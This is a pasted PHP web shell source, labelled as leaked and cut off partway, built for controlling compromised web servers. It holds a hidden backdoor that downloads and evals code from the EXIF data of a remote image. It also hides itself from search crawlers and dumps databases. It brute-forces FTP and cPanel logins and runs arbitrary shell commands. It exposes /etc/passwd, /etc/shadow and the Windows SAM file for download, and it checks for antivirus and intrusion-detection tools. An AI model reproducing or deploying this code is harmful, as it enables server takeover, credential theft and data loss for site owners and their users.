· 7 years ago · Dec 10, 2018, 07:10 AM
1Leaked by : PELITABANGSA .CA[ INDONESIA CYBER ATTACK AND MALWARE ANALYST ]
2<?php
3// Set Username & Password
4$user = "cox";
5$pass = "cox";
6
7$malsite = "http://fightagent.ru"; // Malware Site
8
9$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
10
11@set_magic_quotes_runtime(0);
12@ini_set('error_log',NULL);
13@ini_set('log_errors',0);
14ob_start();
15error_reporting(0);
16@set_time_limit(0);
17@ini_set('max_execution_time',0);
18@ini_set('output_buffering',0);
19$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
20eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
21if(!empty($_SERVER['HTTP_USER_AGENT']))
22{
23 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
24 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
25 header('HTTP/1.0 404 Not Found');
26 exit; }
27}
28// Dump Database
29if($_GET["action"] == "dumpDB")
30{
31 $self=$_SERVER["PHP_SELF"];
32 if(isset($_COOKIE['dbserver']))
33 {
34 $date = date("Y-m-d");
35 $dbserver = $_COOKIE["dbserver"];
36 $dbuser = $_COOKIE["dbuser"];
37 $dbpass = $_COOKIE["dbpass"];
38 $dbname = $_GET['dbname'];
39 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
40
41 $file = "Dump-$dbname-$date";
42
43 $file="Dump-$dbname-$date.sql";
44 $fp = fopen($file,"w");
45
46 function write($data)
47 {
48 global $fp;
49
50 fwrite($fp,$data);
51
52 }
53 mysql_connect ($dbserver, $dbuser, $dbpass);
54 mysql_select_db($dbname);
55 $tables = mysql_query ("SHOW TABLES");
56 while ($i = mysql_fetch_array($tables))
57 {
58 $i = $i['Tables_in_'.$dbname];
59 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
60 write($create['Create Table'].";");
61 $sql = mysql_query ("SELECT * FROM ".$i);
62 if (mysql_num_rows($sql)) {
63 while ($row = mysql_fetch_row($sql)) {
64 foreach ($row as $j => $k) {
65 $row[$j] = "'".mysql_escape_string($k)."'";
66 }
67 write("INSERT INTO $i VALUES(".implode(",", $row).");");
68 }
69 }
70 }
71
72 fclose ($fp);
73
74 header("Content-Disposition: attachment; filename=" . $file);
75 header("Content-Type: application/download");
76 header("Content-Length: " . filesize($file));
77 flush();
78
79 $fp = fopen($file, "r");
80 while (!feof($fp))
81 {
82 echo fread($fp, 65536);
83 flush();
84 }
85 fclose($fp);
86 }
87}
88function shellstyle()
89{
90 echo "<style type=\"text/css\">
91<!--
92
93body,td,th {
94 color: #FF0000;
95 font-size: 14px;
96}
97input.but {
98 background-color:#000000;
99 color:#FF0000;
100 border : 1px solid #1B1B1B;
101}
102a:link {
103 color: #00FF00;
104 text-decoration:none;
105 font-weight:500;
106}
107a:hover {
108 color:#00FF00;
109 text-decoration:underline;
110}
111font.txt
112{
113 color: #00FF00;
114 text-decoration:none;
115 font-size:14px;
116}
117font.mainmenu
118{
119 color:#FF0000;
120 text-decoration:none;
121 font-size:14px;
122}
123a:visited {
124 color: #006600;
125}
126input.box
127{
128 background-color:#0C0C0C;
129 color: lime;
130 border : 1px solid #1B1B1B;
131 -moz-border-radius:6px;
132 width:400;
133 border-radius:6px;
134}
135input.sbox
136{
137 background-color:#0C0C0C;
138 color: lime;
139 border : 1px solid #1B1B1B;
140 -moz-border-radius:6px;
141 width:180;
142 border-radius:6px;
143}
144select.sbox
145{
146 background-color:#0C0C0C;
147 color: lime;
148 border : 1px solid #1B1B1B;
149 -moz-border-radius:6px;
150 width:180;
151 border-radius:6px;
152}
153select.box
154{
155 background-color:#0C0C0C;
156 color: lime;
157 border : 1px solid #1B1B1B;
158 -moz-border-radius:6px;
159 width:400;
160 border-radius:6px;
161}
162
163textarea.box
164{
165 border : 3px solid #111;
166 background-color:#161616;
167 color : lime;
168 margin-top: 10px;
169 -moz-border-radius:7px;
170 border-radius:7px;
171}
172body {
173 background-color:#000000;
174}
175.myphp table
176{
177 width:100%;
178 padding:18px 10px;
179 border : 1px solid #1B1B1B;
180}
181.myphp td
182{
183 background:#111111;
184 color:#00ff00;
185 padding:6px 8px;
186 border-bottom:1px solid #222222;
187 font-size:14px;
188}
189.myphp th, th
190{
191 background:#181818;
192
193}
194-->
195</style>";
196}
197if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
198{
199 $self=$_SERVER["PHP_SELF"];
200 $os = "N/D";
201 $bdmessage = null;
202 $dir = getcwd();
203
204 if(stristr(php_uname(),"Windows"))
205 {
206 $SEPARATOR = '\\';
207 $os = "Windows";
208 $directorysperator="\\";
209 }
210 else if(stristr(php_uname(),"Linux"))
211 {
212 $os = "Linux";
213 $directorysperator='/';
214 }
215 function Trail($d,$directsperator)
216 {
217 $d=explode($directsperator,$d);
218 array_pop($d);
219 array_pop($d);
220 $str=implode($d,$directsperator);
221 return $str;
222 }
223
224 function ftp_check($host,$user,$pass,$timeout)
225 {
226 $ch = curl_init();
227 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
228 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
229 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
230 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
231 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
232 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
233 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
234 $data = curl_exec($ch);
235 if ( curl_errno($ch) == 28 )
236 {
237 print "<center><b>
238 Error : Connection Timeout.
239 Please Check The Target Hostname .</b></center>";exit;
240 }
241 else if ( curl_errno($ch) == 0 )
242 {
243 print "<center><b>[~]</b><font class=txt>
244 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
245 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
246 }
247 curl_close($ch);
248 }
249
250 function cpanel_check($host,$user,$pass,$timeout)
251 {
252 global $cpanel_port;
253 $ch = curl_init();
254 curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
255 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
256 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
257 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
258 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
259 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
260 $data = curl_exec($ch);
261 if ( curl_errno($ch) == 28 )
262 { print "<center><b>Error : Connection Timeout.
263 Please Check The Target Hostname.</b></center>";exit;}
264 else if ( curl_errno($ch) == 0 ){
265 print "<ecnter><b>[~]</b><font class=txt><b>
266
267 Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
268 and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b></center><br><br>";
269 }
270 curl_close($ch);
271 }
272
273 // Database functions
274 function listdatabase()
275 {
276 $self=$_SERVER["PHP_SELF"];
277 ?>
278 <br>
279 <form>
280 <table>
281 <tr>
282 <td><input type="text" class="box" name="dbname"></td>
283 <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
284 </tr>
285 </table>
286 </form>
287 <br>
288 <?php
289 $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
290 $result = mysql_query("SHOW DATABASE");
291 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
292
293 $pDB = mysql_list_dbs( $mysqlHandle );
294 $num = mysql_num_rows( $pDB );
295 for( $i = 0; $i < $num; $i++ )
296 {
297 $dbname = mysql_dbname( $pDB, $i );
298 mysql_select_db($dbname,$mysqlHandle);
299 $result = mysql_query("SHOW TABLES");
300 $num_of_tables = mysql_num_rows($result);
301 echo "<tr>\n";
302 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
303 echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
304 echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
305 echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
306 echo "</tr>\n";
307 }
308 echo "</table>\n";
309 mysql_close($mysqlHandle);
310 }
311
312 function listtable()
313 {
314 $self=$_SERVER["PHP_SELF"];
315 $dbserver = $_COOKIE["dbserver"];
316 $dbuser = $_COOKIE["dbuser"];
317 $dbpass = $_COOKIE["dbpass"];
318 $dbname = $_GET['dbname'];
319 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
320 ?>
321 <br><br>
322 <form>
323 <table>
324
325 <tr>
326 <td><input type="text" class="box" name="tablename"></td>
327 <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
328 </tr>
329 </table>
330
331 <br>
332 <form>
333 <table>
334 <tr>
335 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
336 </tr>
337 <tr>
338 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
339 </tr>
340 </table>
341 </form>
342
343 <?php
344
345 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
346
347 mysql_select_db($dbname);
348 $pTable = mysql_list_tables( $dbname );
349
350 if( $pTable == 0 ) {
351 $msg = mysql_error();
352 echo "<h3>Error : $msg</h3><p>\n";
353 return;
354 }
355 $num = mysql_num_rows( $pTable );
356
357 echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";
358
359 for( $i = 0; $i < $num; $i++ )
360 {
361 $tablename = mysql_tablename( $pTable, $i );
362 $result = mysql_query("select * from $tablename");
363 $num_rows = mysql_num_rows($result);
364 echo "<tr>\n";
365 echo "<td>\n";
366 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
367 echo "</td>\n";
368 echo "<td>\n";
369 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
370 echo "</td>\n";
371 echo "<td>\n";
372 echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
373 echo "</td>\n";
374 echo "<td>\n";
375 echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
376 echo "</td>\n";
377 echo "<td>\n";
378 echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
379 echo "</td>\n";
380 echo "</tr>\n";
381 }
382
383 echo "</table></form>";
384 mysql_close($mysqlHandle);
385 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
386 }
387
388
389 function paramexe($n, $v)
390 {
391 $v = trim($v);
392 if($v)
393 {
394 echo '<span><font size=3>' . $n . ': </font></span>';
395 if(strpos($v, "\n") === false)
396 echo '<font size=2>' . $v . '</font><br>';
397 else
398 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
399 }
400 }
401
402
403
404 function rrmdir($dir)
405 {
406 if (is_dir($dir)) // ensures that we actually have a directory
407 {
408 $objects = scandir($dir); // gets all files and folders inside
409 foreach ($objects as $object)
410 {
411 if ($object != '.' && $object != '..')
412 {
413 if (is_dir($dir . '/' . $object))
414 {
415 // if we find a directory, do a recursive call
416 rrmdir($dir . '/' . $object);
417 }
418 else
419 {
420 // if we find a file, simply delete it
421 unlink($dir . '/' . $object);
422 }
423 }
424 }
425 // the original directory is now empty, so delete it
426 rmdir($dir);
427 }
428 }
429
430 function which($pr)
431 {
432 $path = execmd("which $pr");
433 if(!empty($path))
434 return trim($path);
435 else
436 return trim($pr);
437 }
438
439 function magicboom($text)
440 {
441 if (!get_magic_quotes_gpc())
442 return $text;
443 return stripslashes($text);
444 }
445
446function execmd($cmd,$d_functions="None")
447{
448 if($d_functions=="None")
449 {
450 $ret=passthru($cmd);
451 return $ret;
452 }
453 $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
454 $d_functions=str_replace(" ","",$d_functions);
455 $dis_funcs=explode(",",$d_functions);
456 foreach($funcs as $safe)
457 {
458 if(!in_array($safe,$dis_funcs))
459 {
460 if($safe=="exec")
461 {
462 $ret=@exec($cmd);
463 $ret=join("\n",$ret);
464 return $ret;
465 }
466 elseif($safe=="system")
467 {
468 $ret=@system($cmd);
469 return $ret;
470 }
471 elseif($safe=="passthru")
472 {
473 $ret=@passthru($cmd);
474 return $ret;
475 }
476 elseif($safe=="shell_exec")
477 {
478 $ret=@shell_exec($cmd);
479 return $ret;
480 }
481 elseif($safe=="popen")
482 {
483 $ret=@popen("$cmd",'r');
484 if(is_resource($ret))
485 {
486 while(@!feof($ret))
487 $read.=@fgets($ret);
488 @pclose($ret);
489 return $read;
490 }
491 return -1;
492 }
493 elseif($safe="proc_open")
494 {
495 $cmdpipe=array(
496 0=>array('pipe','r'),
497 1=>array('pipe','w')
498 );
499 $resource=@proc_open($cmd,$cmdpipe,$pipes);
500 if(@is_resource($resource))
501 {
502 while(@!feof($pipes[1]))
503 $ret.=@fgets($pipes[1]);
504 @fclose($pipes[1]);
505 @proc_close($resource);
506 return $ret;
507 }
508 return -1;
509 }
510 }
511 }
512 return -1;
513}
514
515 function getDisabledFunctions()
516 {
517 if(!ini_get('disable_functions'))
518 {
519 return "None";
520 }
521 else
522 {
523 return @ini_get('disable_functions');
524 }
525 }
526
527 function getFilePermissions($file)
528 {
529 $perms = fileperms($file);
530
531 if (($perms & 0xC000) == 0xC000) {
532 // Socket
533 $info = 's';
534 } elseif (($perms & 0xA000) == 0xA000) {
535 // Symbolic Link
536 $info = 'l';
537 } elseif (($perms & 0x8000) == 0x8000) {
538 // Regular
539 $info = '-';
540 } elseif (($perms & 0x6000) == 0x6000) {
541 // Block special
542 $info = 'b';
543 } elseif (($perms & 0x4000) == 0x4000) {
544 // Directory
545 $info = 'd';
546 } elseif (($perms & 0x2000) == 0x2000) {
547 // Character special
548 $info = 'c';
549 } elseif (($perms & 0x1000) == 0x1000) {
550 // FIFO pipe
551 $info = 'p';
552 } else {
553 // Unknown
554 $info = 'u';
555 }
556
557 // Owner
558 $info .= (($perms & 0x0100) ? 'r' : '-');
559 $info .= (($perms & 0x0080) ? 'w' : '-');
560 $info .= (($perms & 0x0040) ?
561 (($perms & 0x0800) ? 's' : 'x' ) :
562 (($perms & 0x0800) ? 'S' : '-'));
563
564 // Group
565 $info .= (($perms & 0x0020) ? 'r' : '-');
566 $info .= (($perms & 0x0010) ? 'w' : '-');
567 $info .= (($perms & 0x0008) ?
568 (($perms & 0x0400) ? 's' : 'x' ) :
569 (($perms & 0x0400) ? 'S' : '-'));
570
571 // World
572 $info .= (($perms & 0x0004) ? 'r' : '-');
573 $info .= (($perms & 0x0002) ? 'w' : '-');
574 $info .= (($perms & 0x0001) ?
575 (($perms & 0x0200) ? 't' : 'x' ) :
576 (($perms & 0x0200) ? 'T' : '-'));
577
578 return $info;
579}
580 function filepermscolor($filename)
581 {
582 if(!@is_readable($filename))
583 return "<font color=\"#FF0000\">".getFilePermissions($filename)."</font>";
584 else if(!@is_writable($filename))
585 return "<font color=\"#FFFFFF\">".getFilePermissions($filename)."</font>";
586 else
587 return "<font color=\"#00FF00\">".getFilePermissions($filename)."</font>";
588 }
589
590 function yourip()
591 {
592 echo $_SERVER["REMOTE_ADDR"];
593 }
594 function phpver()
595 {
596 $pv=@phpversion();
597 echo $pv;
598 }
599 function magic_quote()
600 {
601 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
602 }
603 function serverip()
604 {
605 echo getenv('SERVER_ADDR');
606 }
607 function serverport()
608 {
609 echo $_SERVER['SERVER_PORT'];
610 }
611 function safe()
612 {
613 global $sm;
614 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
615 }
616 function serveradmin()
617 {
618 echo $_SERVER['SERVER_ADMIN'];
619 }
620 function systeminfo()
621 {
622 echo php_uname();
623 }
624 function curlinfo()
625 {
626 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
627 }
628 function oracleinfo()
629 {
630 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
631 }
632 function mysqlinfo()
633 {
634 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
635 }
636 function mssqlinfo()
637 {
638 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
639 }
640 function postgresqlinfo()
641 {
642 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("<font color='red'>Disabled</font>");
643 }
644 function softwareinfo()
645 {
646 echo getenv("SERVER_SOFTWARE");
647 }
648 function download()
649 {
650 $frd=$_GET['download'];
651 $prd=explode("/",$frd);
652 for($i=0;$i<sizeof($prd);$i++)
653 {
654 $nfd=$prd[$i];
655 }
656 @ob_clean();
657 header("Content-type: application/octet-stream");
658 header("Content-length: ".filesize($nfd));
659 header("Content-disposition: attachment; filename=\"".$nfd."\";");
660 readfile($nfd);
661
662 exit;
663
664 }
665
666 function HumanReadableFilesize($size)
667 {
668 $mod = 1024;
669 $units = explode(' ','B KB MB GB TB PB');
670 for ($i = 0; $size > $mod; $i++)
671 {
672 $size /= $mod;
673 }
674 return round($size, 2) . ' ' . $units[$i];
675 }
676
677 function showDrives()
678 {
679 global $self;
680 foreach(range('A','Z') as $drive)
681 {
682 if(is_dir($drive.':\\'))
683 {
684 $myd = $drive.":\\";
685 ?>
686 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
687 <?php echo $myd; ?>
688 </a>
689 <?php
690 }
691 }
692 }
693 function diskSpace()
694 {
695 return disk_total_space("/");
696 }
697 function freeSpace()
698 {
699 return disk_free_space("/");
700 }
701
702 function thiscmd($p)
703 {
704 $path = myexe('which ' . $p);
705 if(!empty($path))
706 return $path;
707 return false;
708 }
709
710 function mysecinfo()
711 {
712 function myparam($n, $v)
713 {
714 $v = trim($v);
715 if($v)
716 {
717 echo '<span><font color =red size=3>' . $n . ': </font></span>';
718 if(strpos($v, "\n") === false)
719 echo '<font color =lime size=3>' . $v . '</font><br>';
720 else
721 echo '<pre class=ml1><font color =lime size=3>' . $v . '</font></pre>';
722 }
723 }
724
725 myparam('Server software', @getenv('SERVER_SOFTWARE'));
726 if(function_exists('apache_get_modules'))
727 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
728 myparam('Open base dir', @ini_get('open_basedir'));
729 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
730 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
731 $temp=array();
732 if(function_exists('mysql_get_client_info'))
733 $temp[] = "MySql (".mysql_get_client_info().")";
734 if(function_exists('mssql_connect'))
735 $temp[] = "MSSQL";
736 if(function_exists('pg_connect'))
737 $temp[] = "PostgreSQL";
738 if(function_exists('oci_connect'))
739 $temp[] = "Oracle";
740 myparam('Supported databases', implode(', ', $temp));
741 echo '<br>';
742
743 if($GLOBALS['os'] == 'Linux') {
744 myparam('Distro : ', myexe("cat /etc/*-release"));
745 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
746 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
747 myparam('OS version', @file_get_contents('/proc/version'));
748 myparam('Distr name', @file_get_contents('/etc/issue.net'));
749 myparam('Where is Perl?', myexe('whereis perl'));
750 myparam('Where is Python?', myexe('whereis python'));
751 myparam('Where is gcc?', myexe('whereis gcc'));
752 myparam('Where is apache?', myexe('whereis apache'));
753 myparam('CPU?', myexe('cat /proc/cpuinfo'));
754 myparam('RAM', myexe('free -m'));
755 myparam('Mount options', myexe('cat /etc/fstab'));
756 myparam('User Limits', myexe('ulimit -a'));
757
758
759 if(!$GLOBALS['safe_mode']) {
760 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
761 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
762 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
763 echo '<br>';
764 $temp=array();
765 foreach ($userful as $item)
766 if(thiscmd($item))
767 $temp[] = $item;
768 myparam('Userful', implode(', ',$temp));
769 $temp=array();
770 foreach ($danger as $item)
771 if(thiscmd($item))
772 $temp[] = $item;
773 myparam('Danger', implode(', ',$temp));
774 $temp=array();
775 foreach ($downloaders as $item)
776 if(thiscmd($item))
777 $temp[] = $item;
778 myparam('Downloaders', implode(', ',$temp));
779 echo '<br/>';
780 myparam('HDD space', myexe('df -h'));
781 myparam('Hosts', @file_get_contents('/etc/hosts'));
782
783 }
784 } else {
785 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
786 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
787 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
788 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
789 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
790 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
791 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
792 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
793 myparam('OS Version',myexe('ver'));
794 myparam('Account Settings',myexe('net accounts'));
795 myparam('User Accounts',myexe('net user'));
796 }
797 echo '</div>';
798 }
799
800
801
802 function myexe($in)
803 {
804 $out = '';
805 if (function_exists('exec')) {
806 @exec($in,$out);
807 $out = @join("\n",$out);
808 } elseif (function_exists('passthru')) {
809 ob_start();
810 @passthru($in);
811 $out = ob_get_clean();
812 } elseif (function_exists('system')) {
813 ob_start();
814 @system($in);
815 $out = ob_get_clean();
816 } elseif (function_exists('shell_exec')) {
817 $out = shell_exec($in);
818 } elseif (is_resource($f = @popen($in,"r"))) {
819 $out = "";
820 while(!@feof($f))
821 $out .= fread($f,1024);
822 pclose($f);
823 }
824 return $out;
825}
826
827 function exec_all($command)
828 {
829
830 $output = '';
831 if(function_exists('exec'))
832 {
833 exec($command,$output);
834 $output = join("\n",$output);
835 }
836
837 else if(function_exists('shell_exec'))
838 {
839 $output = shell_exec($command);
840 }
841
842 else if(function_exists('popen'))
843 {
844 $handle = popen($command , "r"); // Open the command pipe for reading
845 if(is_resource($handle))
846 {
847 if(function_exists('fread') && function_exists('feof'))
848 {
849 while(!feof($handle))
850 {
851 $output .= fread($handle, 512);
852 }
853 }
854 else if(function_exists('fgets') && function_exists('feof'))
855 {
856 while(!feof($handle))
857 {
858 $output .= fgets($handle,512);
859 }
860
861
862
863 }
864 }
865 pclose($handle);
866 }
867
868
869 else if(function_exists('system'))
870 {
871 ob_start(); //start output buffering
872 system($command);
873 $output = ob_get_contents(); // Get the ouput
874 ob_end_clean(); // Stop output buffering
875 }
876
877 else if(function_exists('passthru'))
878 {
879 ob_start(); //start output buffering
880 passthru($command);
881 $output = ob_get_contents(); // Get the ouput
882 ob_end_clean(); // Stop output buffering
883 }
884
885 else if(function_exists('proc_open'))
886 {
887 $descriptorspec = array(
888 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
889 );
890 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
891 if(is_resource($handle))
892 {
893 if(function_exists('fread') && function_exists('feof'))
894 {
895 while(!feof($pipes[1]))
896 {
897 $output .= fread($pipes[1], 512);
898 }
899 }
900 else if(function_exists('fgets') && function_exists('feof'))
901 {
902 while(!feof($pipes[1]))
903 {
904 $output .= fgets($pipes[1],512);
905 }
906 }
907 }
908 pclose($handle);
909 }
910
911 return(htmlspecialchars($output));
912
913}
914
915$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
916$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
917
918function getOGid($value)
919{
920 if(!function_exists('posix_getegid')) {
921 $user = @get_current_user();
922 $uid = @getmyuid();
923 $gid = @getmygid();
924 $group = "?";
925 $owner = $uid . "/". $gid;
926 return $owner;
927 } else {
928 $name=@posix_getpwuid(@fileowner($value));
929 $group=@posix_getgrgid(@filegroup($value));
930 $owner = $name['name']. " / ". $group['name'];
931 return $owner;
932 }
933}
934
935function mainfun($dir)
936{
937 global $ind, $directorysperator,$os;
938
939 $mydir = basename(dirname(__FILE__));
940 $pdir = str_replace($mydir,"",$dir);
941 $pdir = str_replace("/","",$dir);
942
943 $files = array();
944 $dirs = array();
945
946 $odir=opendir($dir);
947 while($file = readdir($odir))
948 {
949 if(is_dir($dir.'/'.$file))
950 {
951 $dirs[]=$file;
952 }
953 else
954 {
955 $files[]=$file;
956 }
957 }
958 $countfiles = count($dirs) + count($files);
959 $dircount = count($dirs);
960 $dircount = $dircount-2;
961 $myfiles = array_merge($dirs,$files);
962 $i = 0;
963 if(is_dir($dir))
964 {
965 if(scandir($dir) === false)
966 echo "<center><font size=3>Directory isn't readable</font></center>";
967 else
968 {
969?><form method="post" id="myform" name="myform">
970 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
971 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
972 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
973 <tr style="background-color:#0C0C0C; height:12px;">
974 <th>Name</th>
975 <th>Size</th>
976 <th>Permissions</th>
977 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
978 <th>Modification Date</th>
979 <th>Rename</th>
980 <th>Download</th>
981 <th style="width:2%;">Action</th>
982 </tr>
983 <?php
984 foreach($myfiles as $val)
985 {
986 $vv = addslashes($dir . $directorysperator . $val);
987 $i++;
988
989 if($val == ".")
990 {
991
992 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
993 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
994
995 <?php if($os != 'Windows')
996 {
997 echo "<td align=center><font size=2>";
998 echo getOGid($dir)."</font></td>";
999 }
1000 ?>
1001
1002 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
1003 <td></td><td></td><td></td></</tr><?php
1004
1005 }
1006 else if($val == "..")
1007 {
1008 $val = Trail($dir . $directorysperator . $val,$directorysperator);
1009 $vv = addslashes($val);
1010 if(empty($vv))
1011 $vv = "/"; ?>
1012 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
1013 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
1014 <?php if($os != 'Windows')
1015 {
1016 echo "<td align=center><font size=2>";
1017 echo getOGid($val)."</font></td>";
1018
1019 } ?>
1020 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
1021 <td></td><td></td><td></td></tr><?php continue;
1022 }
1023 else if(is_dir($vv))
1024 {
1025 ?>
1026 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1027 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
1028 <td class='info'><font size=2>DIR</font></td>
1029
